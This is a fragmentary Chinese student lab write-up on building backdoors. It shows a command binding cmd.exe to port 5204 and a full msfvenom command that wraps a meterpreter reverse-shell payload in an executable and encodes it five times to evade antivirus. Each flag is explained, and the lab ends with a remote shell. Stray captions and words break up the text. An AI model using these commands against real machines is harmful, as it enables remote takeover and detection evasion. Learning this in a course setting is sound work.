crontab -e
指令編輯定時任務。(前面的數字是你想要讓他在每一個小時的某分鐘運行)tcp-listen:5204 exec:cmd.exe,pty,stderr
,用來將cmd.exe綁定到端口5204,同時把cmd.exe的stderr重定向到stdout上。msfvenom -p windows/meterpreter/reverse_tcp -x ./20155204.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1 LPORT=5204 -f exe > 20155204_backdoor.exe
-p 使用的payload。payload翻譯爲有效載荷,就是被運輸有東西。這裏windows/meterpreter/reverse_tcp就是一段shellcode. -x 使用的可執行文件模板,payload(shellcode)就寫入到這個可執行文件中。 -e 使用的編碼器,用於對shellcode變形,爲了免殺。 -i 編碼器的迭代次數。如上即便用該編碼器編碼5次。 -b badchar是payload中須要去除的字符。 LHOST 是反彈回連的IP LPORT 是回連的端口 -f 生成文件的類型 > 輸出到哪一個文件
這裏必定注意理解反彈端口的意義,以及LHOST的意義,不要像我同樣,把LHOST一直設成了被攻擊主機的IP。。。(下面這個是錯誤圖片)
前端
exploit
linux便得到了遠程控制的shell
linux
此次實驗讓我感覺到了本身系統的安全性,在黑客面前就想他們口中的肉雞同樣,這讓我更加認識到了信息安全的重要性。web